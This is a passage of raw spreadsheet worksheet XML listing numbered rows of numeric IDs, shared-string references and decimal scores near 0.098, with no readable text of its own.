      </c>
      <c r="F27478" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27479" ht="15.75" customHeight="1">
      <c r="A27479" s="1">
        <v>29367.0</v>
      </c>
      <c r="B27479" s="2">
        <v>3.1671957E7</v>
      </c>
      <c r="C27479" s="2" t="s">
        <v>26412</v>
      </c>
      <c r="D27479" s="2">
        <v>1.0</v>
      </c>
      <c r="E27479" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27479" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27480" ht="15.75" customHeight="1">
      <c r="A27480" s="1">
        <v>29473.0</v>
      </c>
      <c r="B27480" s="2">
        <v>3.2375667E7</v>
      </c>
      <c r="C27480" s="2" t="s">
        <v>26413</v>
      </c>
      <c r="D27480" s="2">
        <v>1.0</v>
      </c>
      <c r="E27480" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27480" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27481" ht="15.75" customHeight="1">
      <c r="A27481" s="1">
        <v>29779.0</v>
      </c>
      <c r="B27481" s="2">
        <v>3.5006535E7</v>
      </c>
      <c r="C27481" s="2" t="s">
        <v>26414</v>
      </c>
      <c r="D27481" s="2">
        <v>1.0</v>
      </c>
      <c r="E27481" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27481" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27482" ht="15.75" customHeight="1">
      <c r="A27482" s="1">
        <v>30037.0</v>
      </c>
      <c r="B27482" s="2">
        <v>3.6211655E7</v>
      </c>
      <c r="C27482" s="2" t="s">
        <v>26415</v>
      </c>
      <c r="D27482" s="2">
        <v>1.0</v>
      </c>
      <c r="E27482" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27482" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27483" ht="15.75" customHeight="1">
      <c r="A27483" s="1">
        <v>30042.0</v>
      </c>
      <c r="B27483" s="2">
        <v>3.6211715E7</v>
      </c>
      <c r="C27483" s="2" t="s">
        <v>26416</v>
      </c>
      <c r="D27483" s="2">
        <v>1.0</v>
      </c>
      <c r="E27483" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27483" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27484" ht="15.75" customHeight="1">
      <c r="A27484" s="1">
        <v>30117.0</v>
      </c>
      <c r="B27484" s="2">
        <v>3.6820722E7</v>
      </c>
      <c r="C27484" s="2" t="s">
        <v>26417</v>
      </c>
      <c r="D27484" s="2">
        <v>1.0</v>
      </c>
      <c r="E27484" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27484" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27485" ht="15.75" customHeight="1">
      <c r="A27485" s="1">
        <v>30511.0</v>
      </c>
      <c r="B27485" s="2">
        <v>4.0084328E7</v>
      </c>
      <c r="C27485" s="2" t="s">
        <v>26393</v>
      </c>
      <c r="D27485" s="2">
        <v>1.0</v>
      </c>
      <c r="E27485" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27485" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27486" ht="15.75" customHeight="1">
      <c r="A27486" s="1">
        <v>30653.0</v>
      </c>
      <c r="B27486" s="2">
        <v>4.2002131E7</v>
      </c>
      <c r="C27486" s="2" t="s">
        <v>26418</v>
      </c>
      <c r="D27486" s="2">
        <v>1.0</v>
      </c>
      <c r="E27486" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27486" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27487" ht="15.75" customHeight="1">
      <c r="A27487" s="1">
        <v>30915.0</v>
      </c>
      <c r="B27487" s="2">
        <v>4.6791453E7</v>
      </c>
      <c r="C27487" s="2" t="s">
        <v>26419</v>
      </c>
      <c r="D27487" s="2">
        <v>1.0</v>
      </c>
      <c r="E27487" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27487" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27488" ht="15.75" customHeight="1">
      <c r="A27488" s="1">
        <v>31027.0</v>
      </c>
      <c r="B27488" s="2">
        <v>4.7792028E7</v>
      </c>
      <c r="C27488" s="2" t="s">
        <v>26420</v>
      </c>
      <c r="D27488" s="2">
        <v>1.0</v>
      </c>
      <c r="E27488" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27488" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27489" ht="15.75" customHeight="1">
      <c r="A27489" s="1">
        <v>31810.0</v>
      </c>
      <c r="B27489" s="2">
        <v>5.2500526E7</v>
      </c>
      <c r="C27489" s="2" t="s">
        <v>26421</v>
      </c>
      <c r="D27489" s="2">
        <v>1.0</v>
      </c>
      <c r="E27489" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27489" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27490" ht="15.75" customHeight="1">
      <c r="A27490" s="1">
        <v>32298.0</v>
      </c>
      <c r="B27490" s="2">
        <v>5553049.0</v>
      </c>
      <c r="C27490" s="2" t="s">
        <v>2196</v>
      </c>
      <c r="D27490" s="2">
        <v>1.0</v>
      </c>
      <c r="E27490" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27490" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27491" ht="15.75" customHeight="1">
      <c r="A27491" s="1">
        <v>32473.0</v>
      </c>
      <c r="B27491" s="2">
        <v>5688958.0</v>
      </c>
      <c r="C27491" s="2" t="s">
        <v>26422</v>
      </c>
      <c r="D27491" s="2">
        <v>1.0</v>
      </c>
      <c r="E27491" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27491" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27492" ht="15.75" customHeight="1">
      <c r="A27492" s="1">
        <v>33981.0</v>
      </c>
      <c r="B27492" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C27492" s="2" t="s">
        <v>26423</v>
      </c>
      <c r="D27492" s="2">
        <v>1.0</v>
      </c>
      <c r="E27492" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27492" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="27493" ht="15.75" customHeight="1">
      <c r="A27493" s="1">
        <v>17757.0</v>
      </c>
      <c r="B27493" s="2">
        <v>5.071135E7</v>
      </c>
      <c r="C27493" s="2" t="s">
        <v>26424</v>
      </c>
      <c r="D27493" s="2">
        <v>1.0</v>
      </c>
      <c r="E27493" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27493" s="2">
        <v>0.09935897435897434</v>
      </c>
    </row>
    <row r="27494" ht="15.75" customHeight="1">
      <c r="A27494" s="1">
        <v>12587.0</v>
      </c>
      <c r="B27494" s="2">
        <v>3.0046245E7</v>
      </c>
      <c r="C27494" s="2" t="s">
        <v>26425</v>
      </c>
      <c r="D27494" s="2">
        <v>1.0</v>
      </c>
      <c r="E27494" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27494" s="2">
        <v>0.09927140255009108</v>
      </c>
    </row>
    <row r="27495" ht="15.75" customHeight="1">
      <c r="A27495" s="1">
        <v>1616.0</v>
      </c>
      <c r="B27495" s="2">
        <v>2.7822031E7</v>
      </c>
      <c r="C27495" s="2" t="s">
        <v>26426</v>
      </c>
      <c r="D27495" s="2">
        <v>1.0</v>
      </c>
      <c r="E27495" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27495" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27496" ht="15.75" customHeight="1">
      <c r="A27496" s="1">
        <v>2190.0</v>
      </c>
      <c r="B27496" s="2">
        <v>3.1916398E7</v>
      </c>
      <c r="C27496" s="2" t="s">
        <v>26427</v>
      </c>
      <c r="D27496" s="2">
        <v>1.0</v>
      </c>
      <c r="E27496" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27496" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27497" ht="15.75" customHeight="1">
      <c r="A27497" s="1">
        <v>2876.0</v>
      </c>
      <c r="B27497" s="2">
        <v>3.56425E7</v>
      </c>
      <c r="C27497" s="2" t="s">
        <v>26428</v>
      </c>
      <c r="D27497" s="2">
        <v>1.0</v>
      </c>
      <c r="E27497" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27497" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27498" ht="15.75" customHeight="1">
      <c r="A27498" s="1">
        <v>3928.0</v>
      </c>
      <c r="B27498" s="2">
        <v>4.0562334E7</v>
      </c>
      <c r="C27498" s="2" t="s">
        <v>26429</v>
      </c>
      <c r="D27498" s="2">
        <v>1.0</v>
      </c>
      <c r="E27498" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27498" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27499" ht="15.75" customHeight="1">
      <c r="A27499" s="1">
        <v>5805.0</v>
      </c>
      <c r="B27499" s="2">
        <v>4.6791727E7</v>
      </c>
      <c r="C27499" s="2" t="s">
        <v>26430</v>
      </c>
      <c r="D27499" s="2">
        <v>1.0</v>
      </c>
      <c r="E27499" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27499" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27500" ht="15.75" customHeight="1">
      <c r="A27500" s="1">
        <v>8401.0</v>
      </c>
      <c r="B27500" s="2">
        <v>5.3866212E7</v>
      </c>
      <c r="C27500" s="2" t="s">
        <v>26431</v>
      </c>
      <c r="D27500" s="2">
        <v>1.0</v>
      </c>
      <c r="E27500" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27500" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27501" ht="15.75" customHeight="1">
      <c r="A27501" s="1">
        <v>13339.0</v>
      </c>
      <c r="B27501" s="2">
        <v>3.4690743E7</v>
      </c>
      <c r="C27501" s="2" t="s">
        <v>26432</v>
      </c>
      <c r="D27501" s="2">
        <v>1.0</v>
      </c>
      <c r="E27501" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27501" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27502" ht="15.75" customHeight="1">
      <c r="A27502" s="1">
        <v>15244.0</v>
      </c>
      <c r="B27502" s="2">
        <v>4.227146E7</v>
      </c>
      <c r="C27502" s="2" t="s">
        <v>26433</v>
      </c>
      <c r="D27502" s="2">
        <v>1.0</v>
      </c>
      <c r="E27502" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27502" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27503" ht="15.75" customHeight="1">
      <c r="A27503" s="1">
        <v>19439.0</v>
      </c>
      <c r="B27503" s="2">
        <v>5.5702898E7</v>
      </c>
      <c r="C27503" s="2" t="s">
        <v>26434</v>
      </c>
      <c r="D27503" s="2">
        <v>1.0</v>
      </c>
      <c r="E27503" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27503" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27504" ht="15.75" customHeight="1">
      <c r="A27504" s="1">
        <v>32542.0</v>
      </c>
      <c r="B27504" s="2">
        <v>5.7467822E7</v>
      </c>
      <c r="C27504" s="2" t="s">
        <v>26435</v>
      </c>
      <c r="D27504" s="2">
        <v>1.0</v>
      </c>
      <c r="E27504" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27504" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="27505" ht="15.75" customHeight="1">
      <c r="A27505" s="1">
        <v>1777.0</v>
      </c>
      <c r="B27505" s="2">
        <v>2.9028157E7</v>
      </c>
      <c r="C27505" s="2" t="s">
        <v>26436</v>
      </c>
      <c r="D27505" s="2">
        <v>1.0</v>
      </c>
      <c r="E27505" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27505" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27506" ht="15.75" customHeight="1">
      <c r="A27506" s="1">
        <v>2957.0</v>
      </c>
      <c r="B27506" s="2">
        <v>3.6018085E7</v>
      </c>
      <c r="C27506" s="2" t="s">
        <v>26437</v>
      </c>
      <c r="D27506" s="2">
        <v>1.0</v>
      </c>
      <c r="E27506" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27506" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27507" ht="15.75" customHeight="1">
      <c r="A27507" s="1">
        <v>4817.0</v>
      </c>
      <c r="B27507" s="2">
        <v>4.360255E7</v>
      </c>
      <c r="C27507" s="2" t="s">
        <v>26438</v>
      </c>
      <c r="D27507" s="2">
        <v>1.0</v>
      </c>
      <c r="E27507" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27507" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27508" ht="15.75" customHeight="1">
      <c r="A27508" s="1">
        <v>7766.0</v>
      </c>
      <c r="B27508" s="2">
        <v>5.2110312E7</v>
      </c>
      <c r="C27508" s="2" t="s">
        <v>26439</v>
      </c>
      <c r="D27508" s="2">
        <v>1.0</v>
      </c>
      <c r="E27508" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27508" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27509" ht="15.75" customHeight="1">
      <c r="A27509" s="1">
        <v>8749.0</v>
      </c>
      <c r="B27509" s="2">
        <v>5.4548777E7</v>
      </c>
      <c r="C27509" s="2" t="s">
        <v>26440</v>
      </c>
      <c r="D27509" s="2">
        <v>1.0</v>
      </c>
      <c r="E27509" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27509" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27510" ht="15.75" customHeight="1">
      <c r="A27510" s="1">
        <v>9953.0</v>
      </c>
      <c r="B27510" s="2">
        <v>5.690461E7</v>
      </c>
      <c r="C27510" s="2" t="s">
        <v>26441</v>
      </c>
      <c r="D27510" s="2">
        <v>1.0</v>
      </c>
      <c r="E27510" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27510" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27511" ht="15.75" customHeight="1">
      <c r="A27511" s="1">
        <v>10633.0</v>
      </c>
      <c r="B27511" s="2">
        <v>1.4015837E7</v>
      </c>
      <c r="C27511" s="2" t="s">
        <v>26442</v>
      </c>
      <c r="D27511" s="2">
        <v>1.0</v>
      </c>
      <c r="E27511" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27511" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27512" ht="15.75" customHeight="1">
      <c r="A27512" s="1">
        <v>15749.0</v>
      </c>
      <c r="B27512" s="2">
        <v>4.4131551E7</v>
      </c>
      <c r="C27512" s="2" t="s">
        <v>26443</v>
      </c>
      <c r="D27512" s="2">
        <v>1.0</v>
      </c>
      <c r="E27512" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27512" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27513" ht="15.75" customHeight="1">
      <c r="A27513" s="1">
        <v>18156.0</v>
      </c>
      <c r="B27513" s="2">
        <v>5.1887845E7</v>
      </c>
      <c r="C27513" s="2" t="s">
        <v>26444</v>
      </c>
      <c r="D27513" s="2">
        <v>1.0</v>
      </c>
      <c r="E27513" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27513" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27514" ht="15.75" customHeight="1">
      <c r="A27514" s="1">
        <v>21595.0</v>
      </c>
      <c r="B27514" s="2">
        <v>2.4009831E7</v>
      </c>
      <c r="C27514" s="2" t="s">
        <v>26445</v>
      </c>
      <c r="D27514" s="2">
        <v>1.0</v>
      </c>
      <c r="E27514" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27514" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27515" ht="15.75" customHeight="1">
      <c r="A27515" s="1">
        <v>34246.0</v>
      </c>
      <c r="B27515" s="2">
        <v>4.9243695E7</v>
      </c>
      <c r="C27515" s="2" t="s">
        <v>26446</v>
      </c>
      <c r="D27515" s="2">
        <v>1.0</v>
      </c>
      <c r="E27515" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27515" s="2">
        <v>0.09912854030501088</v>
      </c>
    </row>
    <row r="27516" ht="15.75" customHeight="1">
      <c r="A27516" s="1">
        <v>31806.0</v>
      </c>
      <c r="B27516" s="2">
        <v>5245934.0</v>
      </c>
      <c r="C27516" s="2" t="s">
        <v>26447</v>
      </c>
      <c r="D27516" s="2">
        <v>1.0</v>
      </c>
      <c r="E27516" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27516" s="2">
        <v>0.09844054580896686</v>
      </c>
    </row>
    <row r="27517" ht="15.75" customHeight="1">
      <c r="A27517" s="1">
        <v>26322.0</v>
      </c>
      <c r="B27517" s="2">
        <v>1.6666312E7</v>
      </c>
      <c r="C27517" s="2" t="s">
        <v>26448</v>
      </c>
      <c r="D27517" s="2">
        <v>1.0</v>
      </c>
      <c r="E27517" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27517" s="2">
        <v>0.09844054580896684</v>
      </c>
    </row>
    <row r="27518" ht="15.75" customHeight="1">
      <c r="A27518" s="1">
        <v>13996.0</v>
      </c>
      <c r="B27518" s="2">
        <v>3.7383221E7</v>
      </c>
      <c r="C27518" s="2" t="s">
        <v>26449</v>
      </c>
      <c r="D27518" s="2">
        <v>1.0</v>
      </c>
      <c r="E27518" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27518" s="2">
        <v>0.09821428571428571</v>
      </c>
    </row>
    <row r="27519" ht="15.75" customHeight="1">
      <c r="A27519" s="1">
        <v>28638.0</v>
      </c>
      <c r="B27519" s="2">
        <v>2.7304328E7</v>
      </c>
      <c r="C27519" s="2" t="s">
        <v>26450</v>
      </c>
      <c r="D27519" s="2">
        <v>1.0</v>
      </c>
      <c r="E27519" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27519" s="2">
        <v>0.0982142857142857</v>
      </c>
    </row>
    <row r="27520" ht="15.75" customHeight="1">
      <c r="A27520" s="1">
        <v>28450.0</v>
      </c>
      <c r="B27520" s="2">
        <v>2.6593589E7</v>
      </c>
      <c r="C27520" s="2" t="s">
        <v>26451</v>
      </c>
      <c r="D27520" s="2">
        <v>1.0</v>
      </c>
      <c r="E27520" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27520" s="2">
        <v>0.09797979797979794</v>
      </c>
    </row>
    <row r="27521" ht="15.75" customHeight="1">
      <c r="A27521" s="1">
        <v>847.0</v>
      </c>
      <c r="B27521" s="2">
        <v>2.16967E7</v>
      </c>
      <c r="C27521" s="2" t="s">
        <v>26452</v>
      </c>
      <c r="D27521" s="2">
        <v>1.0</v>
      </c>
      <c r="E27521" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27521" s="2">
        <v>0.09797979797979793</v>
      </c>
    </row>
    <row r="27522" ht="15.75" customHeight="1">
      <c r="A27522" s="1">
        <v>30147.0</v>
      </c>
      <c r="B27522" s="2">
        <v>3.7042415E7</v>
      </c>
      <c r="C27522" s="2" t="s">
        <v>26453</v>
      </c>
      <c r="D27522" s="2">
        <v>1.0</v>
      </c>
      <c r="E27522" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27522" s="2">
        <v>0.09788359788359788</v>
      </c>
    </row>
    <row r="27523" ht="15.75" customHeight="1">
      <c r="A27523" s="1">
        <v>7899.0</v>
      </c>
      <c r="B27523" s="2">
        <v>5.2469941E7</v>
      </c>
      <c r="C27523" s="2" t="s">
        <v>26454</v>
      </c>
      <c r="D27523" s="2">
        <v>1.0</v>
      </c>
      <c r="E27523" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27523" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="27524" ht="15.75" customHeight="1">
      <c r="A27524" s="1">
        <v>13867.0</v>
      </c>
      <c r="B27524" s="2">
        <v>3.6952639E7</v>
      </c>
      <c r="C27524" s="2" t="s">
        <v>26455</v>
      </c>
      <c r="D27524" s="2">
        <v>1.0</v>
      </c>
      <c r="E27524" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27524" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="27525" ht="15.75" customHeight="1">
      <c r="A27525" s="1">
        <v>20700.0</v>
      </c>
      <c r="B27525" s="2">
        <v>1.4528519E7</v>
      </c>
      <c r="C27525" s="2" t="s">
        <v>18755</v>
      </c>
      <c r="D27525" s="2">
        <v>1.0</v>
      </c>
      <c r="E27525" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27525" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="27526" ht="15.75" customHeight="1">
      <c r="A27526" s="1">
        <v>21849.0</v>
      </c>
      <c r="B27526" s="2">
        <v>2.7169854E7</v>
      </c>
      <c r="C27526" s="2" t="s">
        <v>26456</v>
      </c>
      <c r="D27526" s="2">
        <v>1.0</v>
      </c>
      <c r="E27526" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27526" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="27527" ht="15.75" customHeight="1">
      <c r="A27527" s="1">
        <v>26962.0</v>
      </c>
      <c r="B27527" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C27527" s="2" t="s">
        <v>26457</v>
      </c>
      <c r="D27527" s="2">
        <v>1.0</v>
      </c>
      <c r="E27527" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27527" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="27528" ht="15.75" customHeight="1">
      <c r="A27528" s="1">
        <v>29650.0</v>
      </c>
      <c r="B27528" s="2">
        <v>3.3857604E7</v>
      </c>
      <c r="C27528" s="2" t="s">
        <v>26458</v>
      </c>
      <c r="D27528" s="2">
        <v>1.0</v>
      </c>
      <c r="E27528" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27528" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="27529" ht="15.75" customHeight="1">
      <c r="A27529" s="1">
        <v>32105.0</v>
      </c>
      <c r="B27529" s="2">
        <v>5.4078661E7</v>
      </c>
      <c r="C27529" s="2" t="s">
        <v>26459</v>
      </c>
      <c r="D27529" s="2">
        <v>1.0</v>
      </c>
      <c r="E27529" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27529" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="27530" ht="15.75" customHeight="1">
      <c r="A27530" s="1">
        <v>24104.0</v>
      </c>
      <c r="B27530" s="2">
        <v>9849779.0</v>
      </c>
      <c r="C27530" s="2" t="s">
        <v>26460</v>
      </c>
      <c r="D27530" s="2">
        <v>1.0</v>
      </c>
      <c r="E27530" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27530" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="27531" ht="15.75" customHeight="1">
      <c r="A27531" s="1">
        <v>8726.0</v>
      </c>
      <c r="B27531" s="2">
        <v>5.4518123E7</v>
      </c>
      <c r="C27531" s="2" t="s">
        <v>26461</v>
      </c>
      <c r="D27531" s="2">
        <v>1.0</v>
      </c>
      <c r="E27531" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27531" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="27532" ht="15.75" customHeight="1">
      <c r="A27532" s="1">
        <v>24768.0</v>
      </c>
      <c r="B27532" s="2">
        <v>1.1866925E7</v>
      </c>
      <c r="C27532" s="2" t="s">
        <v>26462</v>
      </c>
      <c r="D27532" s="2">
        <v>1.0</v>
      </c>
      <c r="E27532" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27532" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="27533" ht="15.75" customHeight="1">
      <c r="A27533" s="1">
        <v>28678.0</v>
      </c>
      <c r="B27533" s="2">
        <v>2.7557049E7</v>
      </c>
      <c r="C27533" s="2" t="s">
        <v>26463</v>
      </c>
      <c r="D27533" s="2">
        <v>1.0</v>
      </c>
      <c r="E27533" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27533" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="27534" ht="15.75" customHeight="1">
      <c r="A27534" s="1">
        <v>29847.0</v>
      </c>
      <c r="B27534" s="2">
        <v>3.5696966E7</v>
      </c>
      <c r="C27534" s="5" t="s">
        <v>26464</v>
      </c>
      <c r="D27534" s="2">
        <v>1.0</v>
      </c>
      <c r="E27534" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27534" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="27535" ht="15.75" customHeight="1">
      <c r="A27535" s="1">
        <v>388.0</v>
      </c>
      <c r="B27535" s="2">
        <v>1.6426506E7</v>
      </c>
      <c r="C27535" s="2" t="s">
        <v>26465</v>
      </c>
      <c r="D27535" s="2">
        <v>1.0</v>
      </c>
      <c r="E27535" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27535" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27536" ht="15.75" customHeight="1">
      <c r="A27536" s="1">
        <v>464.0</v>
      </c>
      <c r="B27536" s="2">
        <v>1.7308341E7</v>
      </c>
      <c r="C27536" s="2" t="s">
        <v>26466</v>
      </c>
      <c r="D27536" s="2">
        <v>1.0</v>
      </c>
      <c r="E27536" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27536" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27537" ht="15.75" customHeight="1">
      <c r="A27537" s="1">
        <v>480.0</v>
      </c>
      <c r="B27537" s="2">
        <v>1.7484043E7</v>
      </c>
      <c r="C27537" s="2" t="s">
        <v>26467</v>
      </c>
      <c r="D27537" s="2">
        <v>1.0</v>
      </c>
      <c r="E27537" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27537" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27538" ht="15.75" customHeight="1">
      <c r="A27538" s="1">
        <v>583.0</v>
      </c>
      <c r="B27538" s="2">
        <v>1.9134354E7</v>
      </c>
      <c r="C27538" s="2" t="s">
        <v>26468</v>
      </c>
      <c r="D27538" s="2">
        <v>1.0</v>
      </c>
      <c r="E27538" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27538" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27539" ht="15.75" customHeight="1">
      <c r="A27539" s="1">
        <v>1859.0</v>
      </c>
      <c r="B27539" s="2">
        <v>2.9493043E7</v>
      </c>
      <c r="C27539" s="2" t="s">
        <v>26469</v>
      </c>
      <c r="D27539" s="2">
        <v>1.0</v>
      </c>
      <c r="E27539" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27539" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27540" ht="15.75" customHeight="1">
      <c r="A27540" s="1">
        <v>2535.0</v>
      </c>
      <c r="B27540" s="2">
        <v>3.4098873E7</v>
      </c>
      <c r="C27540" s="2" t="s">
        <v>26470</v>
      </c>
      <c r="D27540" s="2">
        <v>1.0</v>
      </c>
      <c r="E27540" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27540" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27541" ht="15.75" customHeight="1">
      <c r="A27541" s="1">
        <v>2706.0</v>
      </c>
      <c r="B27541" s="2">
        <v>3.4863333E7</v>
      </c>
      <c r="C27541" s="2" t="s">
        <v>26471</v>
      </c>
      <c r="D27541" s="2">
        <v>1.0</v>
      </c>
      <c r="E27541" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27541" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27542" ht="15.75" customHeight="1">
      <c r="A27542" s="1">
        <v>3476.0</v>
      </c>
      <c r="B27542" s="2">
        <v>3.8386255E7</v>
      </c>
      <c r="C27542" s="2" t="s">
        <v>26472</v>
      </c>
      <c r="D27542" s="2">
        <v>1.0</v>
      </c>
      <c r="E27542" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27542" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27543" ht="15.75" customHeight="1">
      <c r="A27543" s="1">
        <v>4832.0</v>
      </c>
      <c r="B27543" s="2">
        <v>4.3663656E7</v>
      </c>
      <c r="C27543" s="2" t="s">
        <v>26473</v>
      </c>
      <c r="D27543" s="2">
        <v>1.0</v>
      </c>
      <c r="E27543" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27543" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27544" ht="15.75" customHeight="1">
      <c r="A27544" s="1">
        <v>5229.0</v>
      </c>
      <c r="B27544" s="2">
        <v>4.4981931E7</v>
      </c>
      <c r="C27544" s="2" t="s">
        <v>26474</v>
      </c>
      <c r="D27544" s="2">
        <v>1.0</v>
      </c>
      <c r="E27544" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F27544" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="27545" ht="15.75" customHeight="1">
      <c r="A27545" s="1">
        <v>6323.0</v>
      </c>
      <c r="B27545" s="2">
        <v>4.8269444E7</v>
      </c>
      <c r="C27545" s="2" t="s">
        <v>26475</v>
      </c>
      <c r="D27545" s="2">
        <v>1.0</v>
      </c>
      <c r="E27545" s="3" t="s">
        <v>24318</v>
      </c>
